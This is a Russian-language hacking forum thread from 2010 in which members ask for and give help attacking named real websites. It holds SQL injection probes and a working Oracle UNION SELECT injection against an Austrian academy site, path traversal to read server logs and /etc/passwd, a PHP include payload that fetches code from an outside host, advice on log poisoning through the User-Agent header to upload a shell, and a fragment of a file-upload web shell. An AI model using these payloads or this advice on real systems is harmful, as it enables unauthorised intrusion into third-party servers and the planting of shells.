HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.11.2010, 23:56
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Здесь есть скуля?

http://www.airportdriver.at/index.php?id=21&lang=en'
 
Ответить с цитированием

  #2  
Старый 22.11.2010, 01:03
Чакэ
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
С нами: 8285366

Репутация: 62
По умолчанию

Цитата:
Сообщение от FlaktW  
Здесь есть скуля?
http://www.airportdriver.at/index.php?id=21&lang=en'
нет.
 
Ответить с цитированием

  #3  
Старый 22.11.2010, 20:17
ALIM
Новичок
Регистрация: 20.04.2010
Сообщений: 1
С нами: 8452680

Репутация: 0
По умолчанию

http://xxx.com/index.php?id=

Делаю такой запрос ч-з адресную строку

Перехожу:

http://xxx.com/index.php?id=../../../../../../../../../../../../../../../var/log/httpd/error_log%00

в логах

[Mon Nov 22 16:10:39 2010] [error] [client 222.222.222.222] File does not exist: /home/hgjhgjhgjhgjhg/favicon.ico, referer: http://xxx.com/index.php?id=%3C?php%20include(%22http://123.narod.ru/list.php%22);%20?%3E%00 [Mon Nov 22 16:10:41 2010] [error]

т.е. не пишется что он передался ч-з гет. хотя другие записи с гет есть.

access_log огромных размеров но в вверху вообще нет записей моего ip.

Ч-з какую прогу можно отправить правильный запрос чтобы залить шелл(inetcrack или аналоги) help plz
 
Ответить с цитированием

  #4  
Старый 22.11.2010, 20:21
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

2 ALIM

смотри в акцесс_лог е, должно запысыватся USER_AGENT

если есть, то через тампер дату легко залить
 
Ответить с цитированием

  #5  
Старый 22.11.2010, 20:29
ALIM
Новичок
Регистрация: 20.04.2010
Сообщений: 1
С нами: 8452680

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
2 ALIM
смотри в акцесс_лог е, должно запысыватся USER_AGENT
если есть, то через тампер дату легко залить
Да сейчас посмотрел есть юзер-агент, спасибо)
 
Ответить с цитированием

  #6  
Старый 22.11.2010, 21:34
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Здесь возможно обойти фильтрацию?

http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+asdunionasdselec tasd+1,2,3,4,5,6,7,8,9,10,11,12+--+
 
Ответить с цитированием

  #7  
Старый 23.11.2010, 09:38
freezed
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами: 8268086

Репутация: 7
По умолчанию

Цитата:
Сообщение от FlaktW  
Здесь возможно обойти фильтрацию?
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+asdunionasdselec tasd+1,2,3,4,5,6,7,8,9,10,11,12+--+
это оракл:

http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+se lect+1111,null,null,null,null,null,null,null,null, null,null,null+from+sys.dual--

вывод в верхнем меню, где deutsch:

href="/oeaw_servlet/PersonenDetailsGeneric?id=1111"

с ораклом не сталкивался, поэтому как дальше крутить пока не могу подсказать
 
Ответить с цитированием

  #8  
Старый 23.11.2010, 21:21
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Цитата:
Сообщение от freezed  
это оракл:
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+se lect+1111,null,null,null,null,null,null,null,null, null,null,null+from+sys.dual--
вывод в верхнем меню, где deutsch:
href="/oeaw_servlet/PersonenDetailsGeneric?id=
1111
"
с ораклом не сталкивался, поэтому как дальше крутить пока не могу подсказать
Thanks! и +++++++++++
 
Ответить с цитированием

  #9  
Старый 24.11.2010, 07:42
SHiNiGaMi
Познающий
Регистрация: 03.01.2010
Сообщений: 42
С нами: 8606717

Репутация: 3
По умолчанию

забрел на форум avira, оказался на ссылке http://forum.avira.com/wbb/index.php?page=LegalNotice, подставив вместо LegalNotice index, я вышел на index.php, т. е. http://forum.avira.com/wbb/index.php == http://forum.avira.com/wbb/index.php?page=index

является ли это инклудом(пытался другие страницы, /etc/passwd%00 и т.д., пишет, что страница не найдена)?
 
Ответить с цитированием

  #10  
Старый 24.11.2010, 14:26
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

подскажите код, могу создавать страницы на сайте

Цитата:
Сообщение от None  

выполняется команда показа информации о php

как сделать так чтобы можно было залить на сервер файл с другого сайта?

на большой код разных шеллов ругается

Parse error: syntax error, unexpected '>' in с:\xxx\www\includes\common.inc(1695) : eval()'d code on line 1

пробовал так тоже не получается

Цитата:
Сообщение от None  

MuhaciR File Upload System
File:

Your File Must Be .php & it will be uploaded like muh.php
and you can
muhacir.php?&cmd1=[cmd]
muhacir.php?&cmd2=[cmd]
muhacir.php?inc=[shell]

';
fputs($fp, $entry_line);
fclose($fp);
?>
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.